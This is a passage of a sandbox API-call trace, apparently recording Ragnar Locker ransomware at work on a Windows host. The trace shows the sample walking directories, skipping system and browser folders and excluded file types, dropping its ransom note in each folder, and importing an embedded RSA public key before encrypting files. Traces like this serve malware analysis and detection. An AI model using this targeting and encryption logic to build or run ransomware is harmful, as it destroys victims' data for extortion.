returned 1 [0173.914] CryptReleaseContext (hProv=0x3556660, dwFlags=0x0) returned 1 [0173.914] CryptAcquireContextW (in: phProv=0x5cfd630, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5cfd630*=0x0) returned 0 [0173.917] CryptEncrypt (in: hKey=0x3547f40, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d1cfbc*, pdwDataLen=0x5cfe340*=0x28, dwBufLen=0x190 | out: pbData=0x5d1cfbc*, pdwDataLen=0x5cfe340*=0x100) returned 1 [0173.918] GetLastError () returned 0x80090016 [0173.918] CryptEncrypt (in: hKey=0x3547f40, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d1d0bc*, pdwDataLen=0x5cfe340*=0x20, dwBufLen=0x140 | out: pbData=0x5d1d0bc*, pdwDataLen=0x5cfe340*=0x100) returned 1 [0173.918] GetLastError () returned 0x80090016 [0173.918] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xec1af0, lpParameter=0x5d10050, dwCreationFlags=0x0, lpThreadId=0x5cfdd84 | out: lpThreadId=0x5cfdd84*=0xe8c) returned 0x3f0 [0173.919] WaitForMultipleObjects (nCount=0x2, lpHandles=0x5cfe0d0*=0x3b4, bWaitAll=1, dwMilliseconds=0xffffffff) returned 0x0 [0174.309] GetProcessHeap () returned 0x3520000 [0174.309] HeapFree (in: hHeap=0x3520000, dwFlags=0x0, lpMem=0x35869a0 | out: hHeap=0x3520000) returned 1 [0174.310] CloseHandle (hObject=0x3b4) returned 1 [0174.310] GetProcessHeap () returned 0x3520000 [0174.310] HeapFree (in: hHeap=0x3520000, dwFlags=0x0, lpMem=0x3606430 | out: hHeap=0x3520000) returned 1 [0174.311] CloseHandle (hObject=0x3f0) returned 1 [0174.311] GetProcessHeap () returned 0x3520000 [0174.311] HeapFree (in: hHeap=0x3520000, dwFlags=0x0, lpMem=0x5d10050 | out: hHeap=0x3520000) returned 1 [0174.312] FindClose (in: hFindFile=0x3547f00 | out: hFindFile=0x3547f00) returned 1 [0174.313] FindNextFileW (in: hFindFile=0x3547bc0, lpFindFileData=0x5cfeb8c | out: lpFindFileData=0x5cfeb8c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf38014a5, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1041", cAlternateFileName="")) returned 1 [0174.313] lstrcmpiW (lpString1="1041", lpString2=".") returned 1 [0174.313] lstrcmpiW (lpString1="1041", lpString2="..") returned 1 [0174.313] lstrcmpiW (lpString1="1041", lpString2="Windows") returned -1 [0174.313] lstrcmpiW (lpString1="1041", lpString2="Windows.old") returned -1 [0174.313] lstrcmpiW (lpString1="1041", lpString2="Tor browser") returned -1 [0174.313] lstrcmpiW (lpString1="1041", lpString2="Internet Explorer") returned -1 [0174.313] lstrcmpiW (lpString1="1041", lpString2="Google") returned -1 [0174.313] lstrcmpiW (lpString1="1041", lpString2="Opera") returned -1 [0174.313] lstrcmpiW (lpString1="1041", lpString2="Opera Software") returned -1 [0174.313] lstrcmpiW (lpString1="1041", lpString2="Mozilla") returned -1 [0174.313] lstrcmpiW (lpString1="1041", lpString2="Mozilla Firefox") returned -1 [0174.313] lstrcmpiW (lpString1="1041", lpString2="$Recycle.Bin") returned 1 [0174.313] lstrcmpiW (lpString1="1041", lpString2="ProgramData") returned -1 [0174.313] lstrcmpiW (lpString1="1041", lpString2="All Users") returned -1 [0174.313] GetFullPathNameW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\*.*", nBufferLength=0x104, lpBuffer=0x5cfe984, lpFilePart=0x5cff044 | out: lpBuffer="\\\\?\\C:\\588bce7c90097ed212\\*.*", lpFilePart=0x5cff044*="*.*") returned 0x1d [0174.313] lstrcpyW (in: lpString1=0x5cfe9b8, lpString2="1041" | out: lpString1="1041") returned="1041" [0174.314] lstrcatW (in: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1041", lpString2="\\" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1041\\") returned="\\\\?\\C:\\588bce7c90097ed212\\1041\\" [0174.314] lstrcpyW (in: lpString1=0x5cfe778, lpString2="\\\\?\\C:\\588bce7c90097ed212\\1041\\" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1041\\") returned="\\\\?\\C:\\588bce7c90097ed212\\1041\\" [0174.314] lstrcatW (in: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1041\\", lpString2="!$R4GN4R_B8CF767A$!.txt" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1041\\!$R4GN4R_B8CF767A$!.txt") returned="\\\\?\\C:\\588bce7c90097ed212\\1041\\!$R4GN4R_B8CF767A$!.txt" [0174.314] CopyFileW (lpExistingFileName="C:\\Users\\Public\\Documents\\!$R4GN4R_B8CF767A$!.txt" (normalized: "c:\\users\\public\\documents\\!$r4gn4r_b8cf767a$!.txt"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1041\\!$R4GN4R_B8CF767A$!.txt" (normalized: "c:\\588bce7c90097ed212\\1041\\!$r4gn4r_b8cf767a$!.txt"), bFailIfExists=1) returned 1 [0174.319] lstrcatW (in: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1041\\", lpString2="*.*" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1041\\*.*") returned="\\\\?\\C:\\588bce7c90097ed212\\1041\\*.*" [0174.319] GetFullPathNameW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1041\\*.*", nBufferLength=0x104, lpBuffer=0x5cfd864, lpFilePart=0x5cfe338 | out: lpBuffer="\\\\?\\C:\\588bce7c90097ed212\\1041\\*.*", lpFilePart=0x5cfe338*="*.*") returned 0x22 [0174.319] lstrcpyW (in: lpString1=0x5cfd65c, lpString2="*.*" | out: lpString1="*.*") returned="*.*" [0174.319] lstrcpyW (in: lpString1=0x5cfd8a2, lpString2="*.*" | out: lpString1="*.*") returned="*.*" [0174.319] FindFirstFileExW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1041\\*.*", fInfoLevelId=0x1, lpFindFileData=0x5cfde80, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x5cfde80) returned 0x3547f00 [0174.319] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0174.319] FindNextFileW (in: hFindFile=0x3547f00, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf38014a5, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf53e28b4, ftLastWriteTime.dwHighDateTime=0x1d66669, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0174.321] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0174.321] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0174.321] FindNextFileW (in: hFindFile=0x3547f00, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf53bc7fa, ftCreationTime.dwHighDateTime=0x1d66669, ftLastAccessTime.dwLowDateTime=0xf53bc7fa, ftLastAccessTime.dwHighDateTime=0x1d66669, ftLastWriteTime.dwLowDateTime=0xed67b2c2, ftLastWriteTime.dwHighDateTime=0x1d66669, nFileSizeHigh=0x0, nFileSizeLow=0x10fe, dwReserved0=0x0, dwReserved1=0x0, cFileName="!$R4GN4R_B8CF767A$!.txt", cAlternateFileName="")) returned 1 [0174.321] lstrcmpiW (lpString1="!$R4GN4R_B8CF767A$!.txt", lpString2=".") returned -1 [0174.321] lstrcmpiW (lpString1="!$R4GN4R_B8CF767A$!.txt", lpString2="..") returned -1 [0174.321] FindNextFileW (in: hFindFile=0x3547f00, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0x278d, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0174.321] lstrcmpiW (lpString1="eula.rtf", lpString2=".") returned 1 [0174.321] lstrcmpiW (lpString1="eula.rtf", lpString2="..") returned 1 [0174.321] FindNextFileW (in: hFindFile=0x3547f00, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x10a82, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="")) returned 1 [0174.321] lstrcmpiW (lpString1="LocalizedData.xml", lpString2=".") returned 1 [0174.321] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="..") returned 1 [0174.321] FindNextFileW (in: hFindFile=0x3547f00, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x3d58, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="")) returned 1 [0174.321] lstrcmpiW (lpString1="SetupResources.dll", lpString2=".") returned 1 [0174.321] lstrcmpiW (lpString1="SetupResources.dll", lpString2="..") returned 1 [0174.321] FindNextFileW (in: hFindFile=0x3547f00, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x3d58, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="")) returned 0 [0174.321] FindClose (in: hFindFile=0x3547f00 | out: hFindFile=0x3547f00) returned 1 [0174.321] FindFirstFileExW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1041\\*.*", fInfoLevelId=0x1, lpFindFileData=0x5cfde80, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x5cfde80) returned 0x3547f80 [0174.321] FindNextFileW (in: hFindFile=0x3547f80, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf53e28b4, ftLastAccessTime.dwHighDateTime=0x1d66669, ftLastWriteTime.dwLowDateTime=0xf53e28b4, ftLastWriteTime.dwHighDateTime=0x1d66669, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0174.322] FindNextFileW (in: hFindFile=0x3547f80, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf53bc7fa, ftCreationTime.dwHighDateTime=0x1d66669, ftLastAccessTime.dwLowDateTime=0xf53bc7fa, ftLastAccessTime.dwHighDateTime=0x1d66669, ftLastWriteTime.dwLowDateTime=0xed67b2c2, ftLastWriteTime.dwHighDateTime=0x1d66669, nFileSizeHigh=0x0, nFileSizeLow=0x10fe, dwReserved0=0x0, dwReserved1=0x0, cFileName="!$R4GN4R_B8CF767A$!.txt", cAlternateFileName="")) returned 1 [0174.322] GetFullPathNameW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1041\\*.*", nBufferLength=0x104, lpBuffer=0x5cfda6c, lpFilePart=0x5cfe338 | out: lpBuffer="\\\\?\\C:\\588bce7c90097ed212\\1041\\*.*", lpFilePart=0x5cfe338*="*.*") returned 0x22 [0174.322] lstrcpyW (in: lpString1=0x5cfdaaa, lpString2="!$R4GN4R_B8CF767A$!.txt" | out: lpString1="!$R4GN4R_B8CF767A$!.txt") returned="!$R4GN4R_B8CF767A$!.txt" [0174.322] PathFindExtensionW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\1041\\!$R4GN4R_B8CF767A$!.txt") returned=".txt" [0174.322] lstrcmpiW (lpString1="!$R4GN4R_B8CF767A$!.txt", lpString2="!$R4GN4R_B8CF767A$!.txt") returned 0 [0174.322] FindNextFileW (in: hFindFile=0x3547f80, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0x278d, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0174.322] GetFullPathNameW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1041\\*.*", nBufferLength=0x104, lpBuffer=0x5cfda6c, lpFilePart=0x5cfe338 | out: lpBuffer="\\\\?\\C:\\588bce7c90097ed212\\1041\\*.*", lpFilePart=0x5cfe338*="*.*") returned 0x22 [0174.322] lstrcpyW (in: lpString1=0x5cfdaaa, lpString2="eula.rtf" | out: lpString1="eula.rtf") returned="eula.rtf" [0174.322] PathFindExtensionW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\1041\\eula.rtf") returned=".rtf" [0174.322] lstrcmpiW (lpString1="eula.rtf", lpString2="!$R4GN4R_B8CF767A$!.txt") returned 1 [0174.322] lstrcmpiW (lpString1="eula.rtf", lpString2="autorun.inf") returned 1 [0174.322] lstrcmpiW (lpString1="eula.rtf", lpString2="boot.ini") returned 1 [0174.322] lstrcmpiW (lpString1="eula.rtf", lpString2="bootfont.bin") returned 1 [0174.322] lstrcmpiW (lpString1="eula.rtf", lpString2="bootsect.bak") returned 1 [0174.322] lstrcmpiW (lpString1="eula.rtf", lpString2="bootmgr") returned 1 [0174.322] lstrcmpiW (lpString1="eula.rtf", lpString2="bootmgr.efi") returned 1 [0174.322] lstrcmpiW (lpString1="eula.rtf", lpString2="bootmgfw.efi") returned 1 [0174.322] lstrcmpiW (lpString1="eula.rtf", lpString2="desktop.ini") returned 1 [0174.322] lstrcmpiW (lpString1="eula.rtf", lpString2="iconcache.db") returned -1 [0174.322] lstrcmpiW (lpString1="eula.rtf", lpString2="ntldr") returned -1 [0174.322] lstrcmpiW (lpString1="eula.rtf", lpString2="ntuser.dat") returned -1 [0174.322] lstrcmpiW (lpString1="eula.rtf", lpString2="ntuser.dat.log") returned -1 [0174.322] lstrcmpiW (lpString1="eula.rtf", lpString2="ntuser.ini") returned -1 [0174.322] lstrcmpiW (lpString1="eula.rtf", lpString2="thumbs.db") returned -1 [0174.322] lstrcmpiW (lpString1=".rtf", lpString2=".db") returned 1 [0174.323] lstrcmpiW (lpString1=".rtf", lpString2=".sys") returned -1 [0174.323] lstrcmpiW (lpString1=".rtf", lpString2=".dll") returned 1 [0174.323] lstrcmpiW (lpString1=".rtf", lpString2=".lnk") returned 1 [0174.323] lstrcmpiW (lpString1=".rtf", lpString2=".msi") returned 1 [0174.323] lstrcmpiW (lpString1=".rtf", lpString2=".drv") returned 1 [0174.323] lstrcmpiW (lpString1=".rtf", lpString2=".exe") returned 1 [0174.323] GetProcessHeap () returned 0x3520000 [0174.323] RtlAllocateHeap (HeapHandle=0x3520000, Flags=0x8, Size=0xd16c) returned 0x3606430 [0174.324] lstrcpyW (in: lpString1=0x3606830, lpString2="\\\\?\\C:\\588bce7c90097ed212\\1041\\eula.rtf" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1041\\eula.rtf") returned="\\\\?\\C:\\588bce7c90097ed212\\1041\\eula.rtf" [0174.324] FindNextFileW (in: hFindFile=0x3547f80, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x10a82, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="")) returned 1 [0174.324] GetFullPathNameW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1041\\*.*", nBufferLength=0x104, lpBuffer=0x5cfda6c, lpFilePart=0x5cfe338 | out: lpBuffer="\\\\?\\C:\\588bce7c90097ed212\\1041\\*.*", lpFilePart=0x5cfe338*="*.*") returned 0x22 [0174.324] lstrcpyW (in: lpString1=0x5cfdaaa, lpString2="LocalizedData.xml" | out: lpString1="LocalizedData.xml") returned="LocalizedData.xml" [0174.324] PathFindExtensionW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\1041\\LocalizedData.xml") returned=".xml" [0174.324] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="!$R4GN4R_B8CF767A$!.txt") returned 1 [0174.324] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="autorun.inf") returned 1 [0174.325] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="boot.ini") returned 1 [0174.325] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="bootfont.bin") returned 1 [0174.325] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="bootsect.bak") returned 1 [0174.325] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="bootmgr") returned 1 [0174.325] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="bootmgr.efi") returned 1 [0174.325] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="bootmgfw.efi") returned 1 [0174.325] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="desktop.ini") returned 1 [0174.325] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="iconcache.db") returned 1 [0174.325] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="ntldr") returned -1 [0174.325] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="ntuser.dat") returned -1 [0174.325] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="ntuser.dat.log") returned -1 [0174.325] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="ntuser.ini") returned -1 [0174.325] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="thumbs.db") returned -1 [0174.325] lstrcmpiW (lpString1=".xml", lpString2=".db") returned 1 [0174.325] lstrcmpiW (lpString1=".xml", lpString2=".sys") returned 1 [0174.325] lstrcmpiW (lpString1=".xml", lpString2=".dll") returned 1 [0174.325] lstrcmpiW (lpString1=".xml", lpString2=".lnk") returned 1 [0174.325] lstrcmpiW (lpString1=".xml", lpString2=".msi") returned 1 [0174.325] lstrcmpiW (lpString1=".xml", lpString2=".drv") returned 1 [0174.325] lstrcmpiW (lpString1=".xml", lpString2=".exe") returned 1 [0174.325] GetProcessHeap () returned 0x3520000 [0174.325] RtlAllocateHeap (HeapHandle=0x3520000, Flags=0x8, Size=0xd16c) returned 0x5d10050 [0174.327] lstrcpyW (in: lpString1=0x5d10450, lpString2="\\\\?\\C:\\588bce7c90097ed212\\1041\\LocalizedData.xml" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1041\\LocalizedData.xml") returned="\\\\?\\C:\\588bce7c90097ed212\\1041\\LocalizedData.xml" [0174.327] FindNextFileW (in: hFindFile=0x3547f80, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x3d58, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="")) returned 1 [0174.327] GetFullPathNameW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1041\\*.*", nBufferLength=0x104, lpBuffer=0x5cfda6c, lpFilePart=0x5cfe338 | out: lpBuffer="\\\\?\\C:\\588bce7c90097ed212\\1041\\*.*", lpFilePart=0x5cfe338*="*.*") returned 0x22 [0174.327] lstrcpyW (in: lpString1=0x5cfdaaa, lpString2="SetupResources.dll" | out: lpString1="SetupResources.dll") returned="SetupResources.dll" [0174.327] PathFindExtensionW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\1041\\SetupResources.dll") returned=".dll" [0174.327] lstrcmpiW (lpString1="SetupResources.dll", lpString2="!$R4GN4R_B8CF767A$!.txt") returned 1 [0174.327] lstrcmpiW (lpString1="SetupResources.dll", lpString2="autorun.inf") returned 1 [0174.327] lstrcmpiW (lpString1="SetupResources.dll", lpString2="boot.ini") returned 1 [0174.327] lstrcmpiW (lpString1="SetupResources.dll", lpString2="bootfont.bin") returned 1 [0174.327] lstrcmpiW (lpString1="SetupResources.dll", lpString2="bootsect.bak") returned 1 [0174.327] lstrcmpiW (lpString1="SetupResources.dll", lpString2="bootmgr") returned 1 [0174.327] lstrcmpiW (lpString1="SetupResources.dll", lpString2="bootmgr.efi") returned 1 [0174.327] lstrcmpiW (lpString1="SetupResources.dll", lpString2="bootmgfw.efi") returned 1 [0174.327] lstrcmpiW (lpString1="SetupResources.dll", lpString2="desktop.ini") returned 1 [0174.327] lstrcmpiW (lpString1="SetupResources.dll", lpString2="iconcache.db") returned 1 [0174.327] lstrcmpiW (lpString1="SetupResources.dll", lpString2="ntldr") returned 1 [0174.327] lstrcmpiW (lpString1="SetupResources.dll", lpString2="ntuser.dat") returned 1 [0174.327] lstrcmpiW (lpString1="SetupResources.dll", lpString2="ntuser.dat.log") returned 1 [0174.327] lstrcmpiW (lpString1="SetupResources.dll", lpString2="ntuser.ini") returned 1 [0174.327] lstrcmpiW (lpString1="SetupResources.dll", lpString2="thumbs.db") returned -1 [0174.327] lstrcmpiW (lpString1=".dll", lpString2=".db") returned 1 [0174.327] lstrcmpiW (lpString1=".dll", lpString2=".sys") returned -1 [0174.327] lstrcmpiW (lpString1=".dll", lpString2=".dll") returned 0 [0174.328] FindNextFileW (in: hFindFile=0x3547f80, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x3d58, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="")) returned 0 [0174.328] GetProcessHeap () returned 0x3520000 [0174.328] RtlAllocateHeap (HeapHandle=0x3520000, Flags=0x8, Size=0x8) returned 0x3586920 [0174.328] CryptAcquireContextW (in: phProv=0x3586920, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3586920*=0x35564c8) returned 1 [0174.329] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xecd090, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 452 [0174.329] GetProcessHeap () returned 0x3520000 [0174.329] RtlAllocateHeap (HeapHandle=0x3520000, Flags=0x8, Size=0x388) returned 0x358e3b8 [0174.329] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xecd090, cbMultiByte=-1, lpWideCharStr=0x358e3b8, cchWideChar=452 | out: lpWideCharStr="-----BEGIN PUBLIC KEY-----\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAw005kESVyxNWg2h19zL/\ne59YzmvuEZ6uVlvgGRNetNnJR7SKiNBsesbAq3hh+S4EnSxHg+qJPuCPR/Rw6jdM\ncFBkDF+mJN7/xktTy8QVnxDiz8hhhQl/0GJYVhvIGmM5cB8ta+RovnL0EArXAtfi\nWQItYorHGse44WAGWP5EpcjLXj5CBgSvk0gfpqYq5BUfbhbYCmXJJwrdph4z6y3J\n3RgkadGCA5w5bw96snaCQH+nGyhx1V9rEwH5g7Kgcay3vMT5R2SXCbPaI54xB+jn\n4pw6AuVm0I4CAKA+aTz4lU7U9ntP/on4oRLu7mzUbZ8jr+F/TFmuKUc9DmNHeVFb\nCwIDAQAB\n-----END PUBLIC KEY-----\n") returned 452 [0174.329] CryptStringToBinaryW (in: pszString="-----BEGIN PUBLIC KEY-----\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAw005kESVyxNWg2h19zL/\ne59YzmvuEZ6uVlvgGRNetNnJR7SKiNBsesbAq3hh+S4EnSxHg+qJPuCPR/Rw6jdM\ncFBkDF+mJN7/xktTy8QVnxDiz8hhhQl/0GJYVhvIGmM5cB8ta+RovnL0EArXAtfi\nWQItYorHGse44WAGWP5EpcjLXj5CBgSvk0gfpqYq5BUfbhbYCmXJJwrdph4z6y3J\n3RgkadGCA5w5bw96snaCQH+nGyhx1V9rEwH5g7Kgcay3vMT5R2SXCbPaI54xB+jn\n4pw6AuVm0I4CAKA+aTz4lU7U9ntP/on4oRLu7mzUbZ8jr+F/TFmuKUc9DmNHeVFb\nCwIDAQAB\n-----END PUBLIC KEY-----\n", cchString=0x0, dwFlags=0x0, pbBinary=0x0, pcbBinary=0x5cfd640, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x5cfd640, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0174.329] GetProcessHeap () returned 0x3520000 [0174.329] RtlAllocateHeap (HeapHandle=0x3520000, Flags=0x8, Size=0x126) returned 0x35cdc78 [0174.329] CryptStringToBinaryW (in: pszString="-----BEGIN PUBLIC KEY-----\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAw005kESVyxNWg2h19zL/\ne59YzmvuEZ6uVlvgGRNetNnJR7SKiNBsesbAq3hh+S4EnSxHg+qJPuCPR/Rw6jdM\ncFBkDF+mJN7/xktTy8QVnxDiz8hhhQl/0GJYVhvIGmM5cB8ta+RovnL0EArXAtfi\nWQItYorHGse44WAGWP5EpcjLXj5CBgSvk0gfpqYq5BUfbhbYCmXJJwrdph4z6y3J\n3RgkadGCA5w5bw96snaCQH+nGyhx1V9rEwH5g7Kgcay3vMT5R2SXCbPaI54xB+jn\n4pw6AuVm0I4CAKA+aTz4lU7U9ntP/on4oRLu7mzUbZ8jr+F/TFmuKUc9DmNHeVFb\nCwIDAQAB\n-----END PUBLIC KEY-----\n", cchString=0x0, dwFlags=0x0, pbBinary=0x35cdc78, pcbBinary=0x5cfd640, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x35cdc78, pcbBinary=0x5cfd640, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0174.329] GetProcessHeap () returned 0x3520000 [0174.329] HeapFree (in: hHeap=0x3520000, dwFlags=0x0, lpMem=0x358e3b8 | out: hHeap=0x3520000) returned 1 [0174.329] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x35cdc78, cbEncoded=0x126, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x5cfd63c, pcbStructInfo=0x5cfd634 | out: pvStructInfo=0x5cfd63c, pcbStructInfo=0x5cfd634) returned 1 [0174.329] CryptImportPublicKeyInfo (in: hCryptProv=0x35564c8, dwCertEncodingType=0x1, pInfo=0x35948f0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3594920*, PublicKey.cbData=0x10e, PublicKey.pbData=0x3594928*, PublicKey.cUnusedBits=0x0), phKey=0x3586924 | out: phKey=0x3586924*=0x3547d40) returned 1 [0174.329] GetProcessHeap () returned 